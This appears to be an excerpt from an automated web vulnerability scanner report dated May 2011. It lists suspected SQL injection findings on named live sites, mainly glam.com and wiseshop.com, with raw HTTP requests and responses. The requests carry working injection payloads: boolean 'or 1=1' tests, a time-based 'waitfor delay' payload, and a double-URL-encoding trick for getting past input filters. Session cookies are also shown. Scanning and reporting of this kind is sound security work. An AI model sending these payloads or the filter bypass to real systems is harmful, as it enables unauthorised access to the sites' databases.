<script type="text/javascript">Bootloader.setResourceMap({"dWds7":{"type":"css","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/v1\/yg\/r\/-V2muYq3bAL.css"},"\/lUyM":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yj\/r\/QyZCsJKRLP8.css"},"30YXW":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yk\/r\/9Ck4naJeroG.css"},"\/YYg5":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yp\/r\/cdWVmNzOH4t.css"}});Bootloader.setResourceMap({"LNwoY":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yD\/r\/UpS8_ZmY8j-.js"},"JRfiS":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yL\/r\/KI
...[SNIP]...

Request 2

GET /plugins/facepile.php?api_key=8744a0ccdce1491c4474dacf75dc2d12 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://au.myspace.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo233325718'%20or%201%3d2--%20; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.50
X-Cnection: close
Date: Mon, 02 May 2011 12:59:21 GMT
Content-Length: 6085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/oCCo725NxLN.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/IhQ1j6zON26.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["uBXoU"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="transparent_widget facepile UIPage_LoggedOut safari4 Locale_en_US">
<div class="connect_widget"><div class="clearfix profile_images_with_margin"></div></div><script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:372758,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"yeP5w",lhsh:"e3ab7",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"dWds7":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yl\/r\/oCCo725NxLN.css"},"\/lUyM":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yj\/r\/QyZCsJKRLP8.css"},"30YXW":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yC\/r\/IhQ1j6zON26.css"},"\/YYg5":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yK\/r\/5-0-4il9ia5.css"}});Bootloader.setResourceMap({"LNwoY":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yD\/r\/UpS8_ZmY8j-.js"},"JRfiS":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yL\/r\/KI-TuOEw
...[SNIP]...

1.28. http://www.glam.com/profile [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /profile

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /profile HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3%2527; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 1

HTTP/1.1 502 Bad Gateway
Content-Type: text/html
Expires: Mon, 02 May 2011 14:33:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:33:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107

<html><body><h1>502 Bad Gateway</h1>
The server returned an invalid or incomplete response.
</body></html>

Request 2

GET /profile HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3%2527%2527; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 14:33:53 GMT
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 May 2011 14:33:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:33:54 GMT
Content-Length: 27726
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.29. http://www.glam.com/register [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /register

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /register HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)'; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 14:16:33 GMT
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 May 2011 14:16:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:16:33 GMT
Content-Length: 27727
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body class="error404" id="bodyID">
...[SNIP]...

Request 2

GET /register HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)''; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 2

HTTP/1.1 502 Bad Gateway
Content-Type: text/html
Expires: Mon, 02 May 2011 14:17:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:17:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107

<html><body><h1>502 Bad Gateway</h1>
The server returned an invalid or incomplete response.
</body></html>

1.30. http://www.glam.com/register [qcsegs cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /register

Issue detail

The qcsegs cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the qcsegs cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /register HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902%2527; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 14:20:26 GMT
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 May 2011 14:20:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:20:26 GMT
Content-Length: 27727
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body class="error404" id="bodyID">
...[SNIP]...

Request 2

GET /register HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902%2527%2527; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 2

HTTP/1.1 502 Bad Gateway
Content-Type: text/html
Expires: Mon, 02 May 2011 14:21:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:21:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107

<html><body><h1>502 Bad Gateway</h1>
The server returned an invalid or incomplete response.
</body></html>

1.31. http://www.glam.com/topic/feed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /topic/feed/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /topic%2527/feed/ HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
X-Varnish: 1026560449
Expires: Mon, 02 May 2011 14:28:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:28:25 GMT
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailabl
...[SNIP]...
<h1>Error 503 Service Unavailable</h1>
...[SNIP]...

Request 2

GET /topic%2527%2527/feed/ HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 14:28:31 GMT
ETag: "125a6da3d287aa017e47cee5719e8da6"
Content-Type: text/xml; charset=UTF-8
backend-server: app135
X-Varnish: 1026561083
Expires: Mon, 02 May 2011 14:28:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:28:31 GMT
Content-Length: 942
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

1.32. http://www.glam.com/topic/feed/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.glam.com
Path:   /topic/feed/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 63192 milliseconds to respond to the request, compared with 172 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /topic/feed/?1',0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: www.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Last-Modified: Sat, 30 Apr 2011 19:22:01 GMT
ETag: "125a6da3d287aa017e47cee5719e8da6"
Content-Type: text/xml; charset=UTF-8
backend-server: app135
X-Varnish: 1026556522 1026546019
X-Cache-Hits: 1
Expires: Mon, 02 May 2011 14:21:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 14:21:55 GMT
Content-Length: 742
Connection: close

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:atom="http://www.w3.org/2005/Atom
...[SNIP]...

1.33. http://www.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 13880390%20or%201%3d1--%20 and 13880390%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=113880390%20or%201%3d1--%20 HTTP/1.1
Host: www.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmb=234602824; __utmc=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:05:54 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026475851
Expires: Mon, 02 May 2011 13:05:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:05:56 GMT
Connection: close
Content-Length: 20591

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' style='color:white' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' style='color:white' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator 
sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp; B
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=113880390%20or%201%3d2--%20 HTTP/1.1
Host: www.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmb=234602824; __utmc=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:05:57 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026475903
Expires: Mon, 02 May 2011 13:05:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:05:57 GMT
Connection: close
Content-Length: 1968

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><div class='_glam_search_facebook'></div></a> <a href='http://fashion.glam.com/feed/' target='_blank'><div class='_glam_search_rss'></div></a> </ul> </div> </div><div class='homehorizontalBorder'></div>";

document.write(string)

1.34. http://www.wiseshop.com/shop.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wiseshop.com
Path:   /shop.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shop.php?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.wiseshop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=a211571b9df89ace6097499eec2d130de55f084c-954372b780745a3c3e66ad3e1a8a46e46c5b08f3; PHPSESSID=i2htret7k8ivj3snodk9ebjrp2; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl;

Response 1

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.wiseshop.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 May 2011 15:05:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 15:05:49 GMT
Content-Length: 24249
Connection: close
Set-Cookie: uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl; expires=Sun, 02-May-2021 05:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="4777db28467cd55a311f
...[SNIP]...
<span class="post">from Springfield, IL</span></span>
       <span class="child_body">After having several Linksys routers go bad after a month or two of usage, I discovered this Netgear router. I've had it over a year, and I haven't had a problem yet. </span>
       </div></li><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Nicole</span><span class="post">from New York, NY</span></span>
       <span class="child_body">Netgear offers the best wireless routers out there, and they're extremely reliable. Prices vary greatly depending on which kind would satisfy your needs so chose carefully.</span>
       </div></li><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Jennifer</span><span class="post">from Beaver, WV</span></span>
       <span class="child_body">The Linksys WRT54G router is a good, low cost router for home use.</span>
